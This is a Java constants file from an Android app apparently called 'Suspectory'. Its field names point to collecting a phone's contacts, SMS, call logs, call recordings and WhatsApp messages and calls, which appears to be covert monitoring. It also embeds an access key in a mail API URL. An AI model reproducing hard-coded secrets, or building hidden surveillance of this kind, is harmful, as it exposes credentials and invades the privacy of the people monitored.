package com.aftab.suspectory.Utills;

public class Constants {
    public static final String KEY_PREFERENCE_NAME = "Suspectory";
    public static final String IS_LOGGED_IN = "isLoggedIn";
    public static final String KEY_NAME = "name";
    public static final String KEY_ID = "id";
    public static final String KEY_DP = "dp";
    public static final String KEY_EMAIL = "email";
    public static final String PASSWORD = "password";
    public static final String KEY_REF_REPORT = "report";
    public static final String IS_EMAIL_VERIFIED = "isEmailVerified";
    public static final CharSequence EMPTY_ERROR = "Field cannot be empty";
    public static final CharSequence NOT_VALID_ADDRESS = "Invalid Email address";
    public static final String EMAIL_VALID_REGEX = "^[a-zA-Z0-9.!#$%&'*+/=?^_`{|}~-]+@((\\[[0-9]{1,3}\\.[0-9]{1,3}\\.[0-9]{1,3}\\.[0-9]{1,3}\\])|(([a-zA-Z\\-0-9]+\\.)+[a-zA-Z]{2,}))$";
    public static final String KEY_COLLECTION_USERS = "users";
    public static final String ID = "id";
    public static final String KEY_FIRST_NAME = "firstName";
    public static final String KEY_LAST_NAME = "lastName";
    public static final String PHONE = "phone";
    public static final String IS_EMAILSEND = "isEmailSend";
    public static final String CODE = "code";
    public static final String CONTACTS = "contacts";
    public static final String CALL_LOGS = "callLogs";
    public static final String SIM_SMS = "simSMS";
    public static final String DEVICES = "devices";
    public static final int RC_SIGN_IN = 1;


    public static final String ACCESS_KEY = "sk286292djd926d";
    public static final String BASE_URL = "https://kazaya.appistaan.com/mailapi/";
    public static final String MAIL_URL = BASE_URL + "index.php?key=" + ACCESS_KEY;
    public static final String SUSPECTED_CONTACTS = "suspectedContacts";
    public static final String SENT_SIM_MSG = "sentSimMsg";
    public static final String RECEIVE_SIM_MSG = "receiveSimMsg";
    public static final String OUTGOING_SIM_CALL = "OUTGOING";
    public static final String INCOMING_SIM_CALL = "INCOMING";
    public static final String REJECT_SIM_CALL = "REJECTED";
    public static final String MISSED_SIM_CALL = "MISSED";
    public static final String CHAT = "chat";
    public static final String VERIFIED = "verified";
    public static final String WhATSAPP_MESSAGE = "whatsappMessage";
    public static final String RECEIVED_WhATSAPP_MESSAGE = "receivedWhatsappMessage";
    public static final String DEVICE_ID = "deviceId";
    public static final String SELECTED_DEVICE_POSITION = "selectedDevicePosition";
    public static final String GOOGLE = "google";
    public static final String SIGNIN_TYPE = "signInType";
    public static final String SORT_BY = "sortBy";
    public static final String BY_ACCENDING = "ascending";
    public static final String BY_DESCENDING = "descending";
    public static final String READ = "read";
    public static final String OUTGOING_REC_SIM_CALL = "OUTGOING_REC";
    public static final String URL = "url";
    public static final String WHATSAPP_INCOMING_AUDIO = "W_A_INCOMING";
    public static final String WHATSAPP_OUTGOING_AUDIO = "W_A_OUTGOING";
    public static final String WHATSAPP_INCOMING_VIDEO = "W_V_INCOMING";
    public static final String WHATSAPP_OUTGOING_VIDEO = "W_V_OUTGOING";
    public static final String WHATSAPP_MISSED_AUDIO = "W_A_MISSED";
    public static final String WHATSAPP_MISSED_VIDEO = "W_V_MISSED";
    public static final String INCOMING_REC_SIM_CALL = "INCOMING_REC";
    public static final String WHATSAPP_A_CALL_LOG = "wACallLogs";
    public static final String WHATSAPP_V_CALL_LOG = "wVCallLogs";
    public static final String ALL = "All";
    public static final String SIM_CALL = "simCall";
    public static final String SIM_MESSAGE = "simMsg";
    public static final String WA_MESSAGE = "waMsg";
    public static final String WA_CALL = "waCall";
    public static final String PRE_REC = "PRE_REC";
    public static final String PRE_CALL_RECORDINGS = "preCallRecordings";
    public static final String ADDED_DEVICES = "addDevices";
    public static final String FROM = "from";
}
